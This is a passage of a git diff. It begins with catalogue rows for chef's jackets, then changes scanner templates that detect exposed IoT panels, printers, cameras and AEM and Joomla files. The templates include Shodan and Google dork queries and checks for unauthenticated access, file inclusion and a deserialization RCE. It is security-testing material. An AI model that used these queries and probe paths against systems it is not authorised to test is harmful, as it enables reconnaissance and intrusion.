+","Stainless steel press studs    One way fastening    Industrial wash Fabric:65% Polyester, 35% Cotton Weight:200gsm",,7.95,,,100,1,1,1,1,Not Visible Individually,0,"32,33",None,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,,Kustom Kit
 AF001WHIT3XL,Default,simple,admin,Default,"color,full_size",White,3XL,Chef's kit jacket with press stud (DD16)-White-3XL,"Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value.  Washing Instructions: 65 degree industrial wash.
 ","Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value.  Washing Instructions: 65 degree industrial wash.
-","Stainless steel press studs    One way fastening    Industrial wash Fabric:65% Polyester, 35% Cotton Weight:200gsm",,7.95,,,100,1,1,1,1,Not Visible Individually,0,"32,33",None,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,,Kustom Kit
+","Stainless steel press studs    One way fastening    Industrial wash Fabric:65% Polyester, 35% Cotton Weight:200gsm",,7.95,,,100,1,1,1,1,Not Visible Individually,0,"32,33",None,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,,Kustom Kit
 AF001WHIT4XL,Default,simple,admin,Default,"color,full_size",White,4XL,Chef's kit jacket with press stud (DD16)-White-4XL,"Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value.  Washing Instructions: 65 degree industrial wash.
 ","Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value.  Washing Instructions: 65 degree industrial wash.
-","Stainless steel press studs    One way fastening    Industrial wash Fabric:65% Polyester, 35% Cotton Weight:200gsm",,7.95,,,100,1,1,1,1,Not Visible Individually,0,"32,33",None,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,,Kustom Kit
+","Stainless steel press studs    One way fastening    Industrial wash Fabric:65% Polyester, 35% Cotton Weight:200gsm",,7.95,,,100,1,1,1,1,Not Visible Individually,0,"32,33",None,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,,Kustom Kit
 AF001WHITL,Default,simple,admin,Default,"color,full_size",White,L,Chef's kit jacket with press stud (DD16)-White-L,"Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value.  Washing Instructions: 65 degree industrial wash.
 ","Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value.  Washing Instructions: 65 degree industrial wash.
-","Stainless steel press studs    One way fastening    Industrial wash Fabric:65% Polyester, 35% Cotton Weight:200gsm",,7.95,,,100,1,1,1,1,Not Visible Individually,0,"32,33",None,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,,Kustom Kit
+","Stainless steel press studs    One way fastening    Industrial wash Fabric:65% Polyester, 35% Cotton Weight:200gsm",,7.95,,,100,1,1,1,1,Not Visible Individually,0,"32,33",None,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,,Kustom Kit
 AF001WHITM,Default,simple,admin,Default,"color,full_size",White,M,Chef's kit jacket with press stud (DD16)-White-M,"Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value.  Washing Instructions: 65 degree industrial wash.
 ","Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value.  Washing Instructions: 65 degree industrial wash.
-","Stainless steel press studs    One way fastening    Industrial wash Fabric:65% Polyester, 35% Cotton Weight:200gsm",,7.95,,,100,1,1,1,1,Not Visible Individually,0,"32,33",None,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,,Kustom Kit
+","Stainless steel press studs    One way fastening    Industrial wash Fabric:65% Polyester, 35% Cotton Weight:200gsm",,7.95,,,100,1,1,1,1,Not Visible Individually,0,"32,33",None,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,,Kustom Kit
 AF001WHITS,Default,simple,admin,Default,"color,full_size",White,S,Chef's kit jacket with press stud (DD16)-White-S,"Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value.  Washing Instructions: 65 degree industrial wash.
 ","Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value.  Washing Instructions: 65 degree industrial wash.
-","Stainless steel press studs    One way fastening    Industrial wash Fabric:65% Polyester, 35% Cotton Weight:200gsm",,7.95,,,100,1,1,1,1,Not Visible Individually,0,"32,33",None,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,,Kustom Kit
+","Stainless steel press studs    One way fastening    Industrial wash Fabric:65% Polyester, 35% Cotton Weight:200gsm",,7.95,,,100,1,1,1,1,Not Visible Individually,0,"32,33",None,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,,Kustom Kit
 AF001WHITXL,Default,simple,admin,Default,"color,full_size",White,XL,Chef's kit jacket with press stud (DD16)-White-XL,"Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value.  Washing Instructions: 65 degree industrial wash.
 ","Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value.  Washing Instructions: 65 degree industrial wash.
-","Stainless steel press studs    One way fastening    Industrial wash Fabric:65% Polyester, 35% Cotton Weight:200gsm",,7.95,,,100,1,1,1,1,Not Visible Individually,0,"32,33",None,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,,Kustom Kit
+","Stainless steel press studs    One way fastening    Industrial wash Fabric:65% Polyester, 35% Cotton Weight:200gsm",,7.95,,,100,1,1,1,1,Not Visible Individually,0,"32,33",None,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,,Kustom Kit
 AF001WHITXS,Default,simple,admin,Default,"color,full_size",White,XS,Chef's kit jacket with press stud (DD16)-White-XS,"Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value.  Washing Instructions: 65 degree industrial wash.
 ","Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value.  Washing Instructions: 65 degree industrial wash.
-","Stainless steel press studs    One way fastening    Industrial wash Fabric:65% Polyester, 35% Cotton Weight:200gsm",,7.95,,,100,1,1,1,1,Not Visible Individually,0,"32,33",None,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,,Kustom Kit
+","Stainless steel press studs    One way fastening    Industrial wash Fabric:65% Polyester, 35% Cotton Weight:200gsm",,7.95,,,100,1,1,1,1,Not Visible Individually,0,"32,33",None,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,,Kustom Kit
 AF001BLAC2XL,Default,simple,admin,Default,"color,full_size",Black,2XL,Chef's kit jacket with press stud (DD16)-Black-2XL,"Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value.  Washing Instructions: 65 degree industrial wash.
 ","Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value.  Washing Instructions: 65 degree industrial wash.
-","Stainless steel press studs    One way fastening    Industrial wash Fabric:65% Polyester, 35% Cotton Weight:200gsm",,7.95,,,100,1,1,1,1,Not Visible Individually,0,"32,33",None,/Wetransfer-b10265/AFD by Dennys/AF011_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF011_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF011_LS1.jpg,,Kustom Kit
+","Stainless steel press studs    One way fastening    Industrial wash Fabric:65% Polyester, 35% Cotton Weight:200gsm",,7.95,,,100,1,1,1,1,Not Visible Individually,0,"32,33",None,/Wetransfer-b10265/AFD by Dennys/AF011_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF011_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF011_LS1.jpg,,Kustom Kit
 AF001,Default,configurable,admin,Default,"color,full_size",,,Chef's kit jacket with press stud (DD16),"Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value.  Washing Instructions: 65 degree industrial wash.
 ","Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value.  Washing Instructions: 65 degree industrial wash.
-","Stainless steel press studs    One way fastening    Industrial wash Fabric:65% Polyester, 35% Cotton Weight:200gsm",,7.95,,,100,1,1,1,1,"Catalog, Search",0,"32,33",None,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg::White;/Wetransfer-b10265/AFD by Dennys/AF011_LS1.jpg::Black;/wetransfer-b10265/Alexandra/AX001_LS1.jpg;/wetransfer-b10265/Alexandra/AX005_LS1.jpg;,Kustom Kit
+","Stainless steel press studs    One way fastening    Industrial wash Fabric:65% Polyester, 35% Cotton Weight:200gsm",,7.95,,,100,1,1,1,1,"Catalog, Search",0,"32,33",None,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg::White;/Wetransfer-b10265/AFD by Dennys/AF011_LS1.jpg::Black;/wetransfer-b10265/Alexandra/AX001_LS1.jpg;/wetransfer-b10265/Alexandra/AX005_LS1.jpg;,Kustom Kit
diff --git a/helpers/wordlists/grafana-plugins.txt b/helpers/wordlists/grafana-plugins.txt
index 405f3963da..e34aabe713 100644
--- a/helpers/wordlists/grafana-plugins.txt
+++ b/helpers/wordlists/grafana-plugins.txt
@@ -225,7 +225,9 @@ sskgo-perfcurve-panel
 stackdriver
 stagemonitor-elasticsearch-app
 stat
+state
 state-timeline
+status
 status-histor
 streamr-datasource
 table
diff --git a/iot/apc-ups-login.yaml b/iot/apc-ups-login.yaml
index 46722d9e73..25c3dd539f 100644
--- a/iot/apc-ups-login.yaml
+++ b/iot/apc-ups-login.yaml
@@ -4,8 +4,8 @@ info:
   name: APC UPS Login
   author: droberson
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=title%3A%22APC+%7C+Log+On%22
+  metadata:
+    shodan-query: title:"APC | Log On"
   tags: iot,panel
 
 requests:
diff --git a/iot/automation-direct.yaml b/iot/automation-direct.yaml
index 80552356b0..ed148f02e8 100644
--- a/iot/automation-direct.yaml
+++ b/iot/automation-direct.yaml
@@ -8,8 +8,8 @@ info:
     - https://www.exploit-db.com/ghdb/7295
   metadata:
     shodan-query: http.title:"C-more -- the best HMI presented by AutomationDirect"
-    google-dork: intitle:"C-more -- the best HMI presented by AutomationDirect"
-  tags: panel,iot
+    google-query: intitle:"C-more -- the best HMI presented by AutomationDirect"
+  tags: panel,iot,edb
 
 requests:
   - method: GET
diff --git a/iot/brother-printer-detect.yaml b/iot/brother-printer-detect.yaml
index 86589db024..ecf0f021fc 100644
--- a/iot/brother-printer-detect.yaml
+++ b/iot/brother-printer-detect.yaml
@@ -1,23 +1,23 @@
-id: brother-printer-detect
+id: brother-printer-detect
 
-info:
-  name: Brother Printer
-  author: pussycat0x
-  severity: low
-  reference: https://www.exploit-db.com/ghdb/6889
-  tags: iot,printer,tech
+info:
+  name: Brother Printer
+  author: pussycat0x
+  severity: low
+  reference: https://www.exploit-db.com/ghdb/6889
+  tags: iot,printer,tech
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/general/status.html"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "Brother Industries"
-
-      - type: status
-        status:
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/general/status.html"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Brother Industries"
+
+      - type: status
+        status:
           - 200
\ No newline at end of file
diff --git a/iot/brother-unauthorized-access.yaml b/iot/brother-unauthorized-access.yaml
index f3e5d8283c..f0e73f3ef8 100644
--- a/iot/brother-unauthorized-access.yaml
+++ b/iot/brother-unauthorized-access.yaml
@@ -1,25 +1,25 @@
-id: brother-unauthorized-access
+id: brother-unauthorized-access
 
-info:
-  name: Brother Printer
-  author: pussycat0x
-  severity: medium
-  reference: https://www.exploit-db.com/ghdb/6889
-  tags: iot,printer,unauth
+info:
+  name: Brother Printer
+  author: pussycat0x
+  severity: medium
+  reference: https://www.exploit-db.com/ghdb/6889
+  tags: iot,printer,unauth
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/net/net/net.html"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "Brother Industries"
-          - "Network Status"
-        condition: and
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/net/net/net.html"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Brother Industries"
+          - "Network Status"
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/iot/codian-mcu-login.yaml b/iot/codian-mcu-login.yaml
index 5f3afaa08c..a4182c7a17 100644
--- a/iot/codian-mcu-login.yaml
+++ b/iot/codian-mcu-login.yaml
@@ -8,7 +8,7 @@ info:
     - https://www.exploit-db.com/ghdb/7404
   metadata:
     shodan-query: http.title:"Codian MCU - Home page"
-  tags: iot
+  tags: iot,edb
 
 requests:
   - method: GET
diff --git a/iot/contacam.yaml b/iot/contacam.yaml
index e951c3364f..e619a2c1f6 100644
--- a/iot/contacam.yaml
+++ b/iot/contacam.yaml
@@ -6,7 +6,7 @@ info:
   severity: low
   reference:
     - https://www.exploit-db.com/ghdb/6831
-  tags: iot
+  tags: edb,iot
 
 requests:
   - method: GET
diff --git a/iot/envision-gateway.yaml b/iot/envision-gateway.yaml
index 87b61a01b1..f485d64668 100644
--- a/iot/envision-gateway.yaml
+++ b/iot/envision-gateway.yaml
@@ -8,7 +8,7 @@ info:
     - https://www.exploit-db.com/ghdb/7315
   metadata:
     shodan-query: http.title:"EnvisionGateway"
-  tags: iot
+  tags: iot,edb
 
 requests:
   - method: GET
diff --git a/iot/epmp-login.yaml b/iot/epmp-login.yaml
index d8a3b800ba..ce1594c658 100644
--- a/iot/epmp-login.yaml
+++ b/iot/epmp-login.yaml
@@ -6,7 +6,7 @@ info:
   severity: info
   reference:
     - https://www.exploit-db.com/ghdb/6826
-  tags: iot,panel
+  tags: panel,edb,iot
 
 requests:
   - method: GET
diff --git a/iot/heatmiser-wifi-thermostat.yaml b/iot/heatmiser-wifi-thermostat.yaml
index 44b598afbd..f3e08e52b8 100644
--- a/iot/heatmiser-wifi-thermostat.yaml
+++ b/iot/heatmiser-wifi-thermostat.yaml
@@ -8,7 +8,7 @@ info:
     - https://www.exploit-db.com/ghdb/7445
   metadata:
     shodan-query: http.title:"Heatmiser Wifi Thermostat"
-  tags: iot
+  tags: iot,edb
 
 requests:
   - method: GET
diff --git a/iot/hp-color-laserjet-detect.yaml b/iot/hp-color-laserjet-detect.yaml
index f9856a3af2..76d44aec3d 100644
--- a/iot/hp-color-laserjet-detect.yaml
+++ b/iot/hp-color-laserjet-detect.yaml
@@ -2,7 +2,7 @@ id: hp-color-laserjet-detect
 
 info:
   name: HP Color LaserJet detection
-  author: idealphase
+  author: idealphase,gy741
   severity: info
   reference:
     - http://www.hp.com/
@@ -24,6 +24,7 @@ requests:
         words:
           - "<title>HP Color LaserJet"
           - '<td class="mastheadTitle"><h1>HP Color LaserJet'
+          - '<strong class="product">HP Color LaserJet'
 
       - type: status
         status:
diff --git a/iot/hp-device-info-detect.yaml b/iot/hp-device-info-detect.yaml
index b00b5b26b2..8a876098e1 100644
--- a/iot/hp-device-info-detect.yaml
+++ b/iot/hp-device-info-detect.yaml
@@ -1,24 +1,24 @@
-id: hp-device-info-detect
+id: hp-device-info-detect
 
-info:
-  name: HP LaserJet
-  author: pussycat0x
-  severity: low
-  reference: https://www.exploit-db.com/ghdb/6905
-  tags: iot,hp
+info:
+  name: HP LaserJet
+  author: pussycat0x
+  severity: low
+  reference: https://www.exploit-db.com/ghdb/6905
+  tags: iot,hp
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/hp/device/DeviceInformation/View"
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "Device Information"
-          - "hp"
-        condition: and
-
-      - type: status
-        status:
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/hp/device/DeviceInformation/View"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Device Information"
+          - "hp"
+        condition: and
+
+      - type: status
+        status:
           - 200
\ No newline at end of file
diff --git a/iot/hp-laserjet-detect.yaml b/iot/hp-laserjet-detect.yaml
index 6de8b80cd4..7f25f1c30d 100644
--- a/iot/hp-laserjet-detect.yaml
+++ b/iot/hp-laserjet-detect.yaml
@@ -6,7 +6,7 @@ info:
   severity: low
   reference:
     - https://www.exploit-db.com/ghdb/6459
-  tags: iot
+  tags: iot,edb
 
 requests:
   - method: GET
diff --git a/iot/internet-service.yaml b/iot/internet-service.yaml
index 1afb1c3148..98535dd837 100644
--- a/iot/internet-service.yaml
+++ b/iot/internet-service.yaml
@@ -6,7 +6,7 @@ info:
   severity: low
   reference:
     - https://www.exploit-db.com/ghdb/5948
-  tags: iot
+  tags: iot,edb
 
 requests:
   - method: GET
diff --git a/iot/liveview-axis-camera.yaml b/iot/liveview-axis-camera.yaml
index ee685d6691..85d7c81525 100644
--- a/iot/liveview-axis-camera.yaml
+++ b/iot/liveview-axis-camera.yaml
@@ -6,7 +6,7 @@ info:
   severity: info
   reference:
     - https://www.exploit-db.com/ghdb/6843
-  tags: iot,axis,network
+  tags: axis,network,edb,iot
 
 requests:
   - method: GET
diff --git a/iot/mobotix-guest-camera.yaml b/iot/mobotix-guest-camera.yaml
index 18cba181d9..f08fc3d0a2 100644
--- a/iot/mobotix-guest-camera.yaml
+++ b/iot/mobotix-guest-camera.yaml
@@ -6,7 +6,7 @@ info:
   severity: info
   reference:
     - https://www.exploit-db.com/ghdb/6848
-  tags: iot
+  tags: iot,edb
 
 requests:
   - method: GET
diff --git a/iot/netsurveillance-web.yaml b/iot/netsurveillance-web.yaml
index f851db71bc..91a96b646b 100644
--- a/iot/netsurveillance-web.yaml
+++ b/iot/netsurveillance-web.yaml
@@ -8,8 +8,8 @@ info:
     - https://www.exploit-db.com/ghdb/7288
   metadata:
     shodan-query: http.title:"NETSurveillance WEB"
-    google-dork: intitle:"NETSurveillance WEB"
-  tags: tech,iot
+    google-query: intitle:"NETSurveillance WEB"
+  tags: tech,iot,edb
 
 requests:
   - method: GET
diff --git a/iot/novus-ip-camera.yaml b/iot/novus-ip-camera.yaml
new file mode 100644
index 0000000000..6b1a7e908b
--- /dev/null
+++ b/iot/novus-ip-camera.yaml
@@ -0,0 +1,32 @@
+id: novus-ip-camera
+
+info:
+  name: NoVus IP camera Login
+  author: DhiyaneshDk
+  severity: info
+  reference:
+    - https://www.exploit-db.com/ghdb/8002
+  metadata:
+    verified: true
+    google-query: intitle:"NoVus IP camera" -com
+  tags: camera,novus,edb,iot,panel
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/Pages/login.htm"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<title>NoVus IP camera</title>"
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200
diff --git a/iot/nuuno-network-login.yaml b/iot/nuuno-network-login.yaml
index 3aed6fe01f..b2df8d77d2 100644
--- a/iot/nuuno-network-login.yaml
+++ b/iot/nuuno-network-login.yaml
@@ -6,7 +6,7 @@ info:
   severity: info
   reference:
     - https://www.exploit-db.com/ghdb/6840
-  tags: iot,panel,nuuo
+  tags: iot,panel,nuuo,edb
 
 requests:
   - method: GET
diff --git a/iot/panasonic-network-management.yaml b/iot/panasonic-network-management.yaml
index 26262c73bc..148bed407d 100644
--- a/iot/panasonic-network-management.yaml
+++ b/iot/panasonic-network-management.yaml
@@ -6,7 +6,7 @@ info:
   severity: medium
   reference:
     - https://www.exploit-db.com/ghdb/6487
-  tags: iot,camera,panasonic
+  tags: iot,camera,panasonic,edb
 
 requests:
   - method: GET
diff --git a/iot/qvisdvr-deserialization-rce.yaml b/iot/qvisdvr-deserialization-rce.yaml
index 23e643a70e..ba88807fa4 100644
--- a/iot/qvisdvr-deserialization-rce.yaml
+++ b/iot/qvisdvr-deserialization-rce.yaml
@@ -4,8 +4,14 @@ info:
   name: QVISDVR JSF Deserialization - Remote Code Execution
   author: me9187
   severity: critical
+  description: |
+    QVISDVR Java-Deserialization was discovered, which could allow remote code execution.
   reference:
     - https://twitter.com/Me9187/status/1414606876575162373
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
   tags: qvisdvr,rce,deserialization,jsf,iot
 
 requests:
@@ -33,11 +39,14 @@ requests:
 
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 500
 
       - type: word
         part: interactsh_protocol
         words:
-          - http
\ No newline at end of file
+          - http
+
+      - type: status
+        status:
+          - 500
+
+# Enhanced by mp on 2022/05/19
diff --git a/iot/targa-camera-lfi.yaml b/iot/targa-camera-lfi.yaml
index cc8f60c715..40de4a9464 100644
--- a/iot/targa-camera-lfi.yaml
+++ b/iot/targa-camera-lfi.yaml
@@ -1,14 +1,16 @@
 id: targa-camera-lfi
 
 info:
-  name: Selea Targa IP OCR-ANPR Camera - Unauthenticated Directory Traversal
+  name: Selea Targa IP OCR-ANPR Camera - Local File Inclusion
   author: gy741
   severity: high
-  description: The ANPR camera suffers from an unauthenticated arbitrary file disclosure vulnerability. Input passed through the Download Archive in Storage page using get_file.php script is not properly verified
-    before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal attacks and aid the attacker to disclose clear-text credentials resulting
-    in authentication bypass.
+  description: Selea Targa IP OCR-ANPR camera suffers from an unauthenticated local file inclusion vulnerability because input passed through the Download Archive in Storage page using get_file.php script is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal attacks and aid the attacker in disclosing clear-text credentials.
   reference:
     - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5616.php
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+    cvss-score: 8.6
+    cwe-id: CWE-22
   tags: targa,lfi,iot,camera,selea
 
 requests:
@@ -26,3 +28,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/14
diff --git a/iot/webcamxp-5.yaml b/iot/webcamxp-5.yaml
index fba34abdae..689f299d7e 100644
--- a/iot/webcamxp-5.yaml
+++ b/iot/webcamxp-5.yaml
@@ -8,7 +8,7 @@ info:
     - https://www.exploit-db.com/ghdb/7448
   metadata:
     shodan-query: http.title:"webcamXP 5"
-  tags: iot
+  tags: iot,edb
 
 requests:
   - method: GET
diff --git a/miscellaneous/joomla-htaccess.yaml b/miscellaneous/joomla-htaccess.yaml
index cd711772f7..56007623b7 100644
--- a/miscellaneous/joomla-htaccess.yaml
+++ b/miscellaneous/joomla-htaccess.yaml
@@ -1,10 +1,10 @@
 id: joomla-htaccess-file
 
 info:
-  name: Joomla htaccess file disclosure
+  name: Joomla! htaccess file disclosure
   author: oppsec
   severity: info
-  description: Joomla has an htaccess file to store configurations about HTTP config, directory listing, etc.
+  description: Joomla!  has an htaccess file to store configurations about HTTP config, directory listing, etc.
   tags: misc,joomla
 
 requests:
diff --git a/miscellaneous/joomla-manifest-file.yaml b/miscellaneous/joomla-manifest-file.yaml
index bdb7dc1c79..8ec7c57c36 100644
--- a/miscellaneous/joomla-manifest-file.yaml
+++ b/miscellaneous/joomla-manifest-file.yaml
@@ -1,10 +1,10 @@
 id: joomla-manifest-file
 
 info:
-  name: Joomla Manifest File Disclosure
+  name: Joomla! Manifest File Disclosure
   author: oppsec
   severity: info
-  description: A Joomla Manifest file was discovered. joomla.xml is a file which stores information about installed Joomla, such as version, files, and paths.
+  description: A Joomla! Manifest file was discovered. joomla.xml is a file which stores information about installed Joomla!, such as version, files, and paths.
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 5.3
diff --git a/miscellaneous/robots-txt-endpoint.yaml b/miscellaneous/robots-txt-endpoint.yaml
new file mode 100644
index 0000000000..1ad6774e3c
--- /dev/null
+++ b/miscellaneous/robots-txt-endpoint.yaml
@@ -0,0 +1,26 @@
+id: robots-txt-endpoint
+
+info:
+  name: robots.txt endpoint prober
+  author: CasperGN,pdteam
+  severity: info
+
+requests:
+  - method: GET
+    path:
+      - "{{RootURL}}/robots.txt"
+      - "{{RootURL}}{{endpoint}}"
+
+    extractors:
+      - type: regex
+        name: endpoint
+        group: 1
+        regex:
+          - '(?m:\s(/[[:alpha:]]+[[:graph:]]+))'
+        internal: true
+
+    iterate-all: true
+    matchers:
+      - type: status
+        status:
+          - 200
\ No newline at end of file
diff --git a/miscellaneous/robots-txt.yaml b/miscellaneous/robots-txt.yaml
index c5a92a1318..45a7cd1428 100644
--- a/miscellaneous/robots-txt.yaml
+++ b/miscellaneous/robots-txt.yaml
@@ -2,7 +2,7 @@ id: robots-txt
 
 info:
   name: robots.txt file
-  author: CasperGN
+  author: CasperGN,TheZakMan
   severity: info
   tags: misc,generic
 
diff --git a/misconfiguration/adobe/adobe-connect-username-exposure.yaml b/misconfiguration/adobe/adobe-connect-username-exposure.yaml
index 2e4d3089a9..21edac88e0 100644
--- a/misconfiguration/adobe/adobe-connect-username-exposure.yaml
+++ b/misconfiguration/adobe/adobe-connect-username-exposure.yaml
@@ -6,7 +6,7 @@ info:
   severity: low
   reference:
     - https://packetstormsecurity.com/files/161345/Adobe-Connect-10-Username-Disclosure.html
-  tags: adobe,disclosure
+  tags: adobe,disclosure,packetstorm
 
 requests:
   - method: GET
diff --git a/misconfiguration/aem/aem-acs-common.yaml b/misconfiguration/aem/aem-acs-common.yaml
new file mode 100644
index 0000000000..ec50a54d12
--- /dev/null
+++ b/misconfiguration/aem/aem-acs-common.yaml
@@ -0,0 +1,32 @@
+id: aem-acs-common
+
+info:
+  name: Adobe AEM ACS Common Exposure
+  author: dhiyaneshDk
+  severity: medium
+  reference:
+    - https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt
+  metadata:
+    shodan-query:
+      - http.title:"AEM Sign In"
+      - http.component:"Adobe Experience Manager"
+  tags: misconfig,aem,adobe
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/etc/acs-commons/jcr-compare.html"
+      - "{{BaseURL}}/etc/acs-commons/workflow-remover.html"
+      - "{{BaseURL}}/etc/acs-commons/version-compare.html"
+      - "{{BaseURL}}/etc/acs-commons/oak-index-manager.html"
+
+    stop-at-first-match: true
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>Version Compare | ACS AEM Commons</title>'
+          - '<title>Oak Index Manager | ACS AEM Commons</title>'
+          - '<title>JCR Compare | ACS AEM Commons</title>'
+          - '<title>Workflow Remover | ACS AEM Commons</title>'
+        condition: or
diff --git a/misconfiguration/aem/aem-bg-servlet.yaml b/misconfiguration/aem/aem-bg-servlet.yaml
index 6a3c2a07b3..1cddfb1870 100644
--- a/misconfiguration/aem/aem-bg-servlet.yaml
+++ b/misconfiguration/aem/aem-bg-servlet.yaml
@@ -6,6 +6,8 @@ info:
   severity: info
   reference:
     - https://www.slideshare.net/0ang3el/hunting-for-security-bugs-in-aem-webapps-129262212
+  metadata:
+    shodan-query: http.component:"Adobe Experience Manager"
   tags: aem
 
 requests:
diff --git a/misconfiguration/aem/aem-cached-pages.yaml b/misconfiguration/aem/aem-cached-pages.yaml
index 6174a7edb5..eafcee4163 100644
--- a/misconfiguration/aem/aem-cached-pages.yaml
+++ b/misconfiguration/aem/aem-cached-pages.yaml
@@ -6,6 +6,8 @@ info:
   severity: low
   reference:
     - https://twitter.com/AEMSecurity/status/1244965623689609217
+  metadata:
+    shodan-query: http.component:"Adobe Experience Manager"
   tags: aem
 
 requests:
diff --git a/misconfiguration/aem/aem-crx-browser.yaml b/misconfiguration/aem/aem-crx-browser.yaml
new file mode 100644
index 0000000000..10f945b6e9
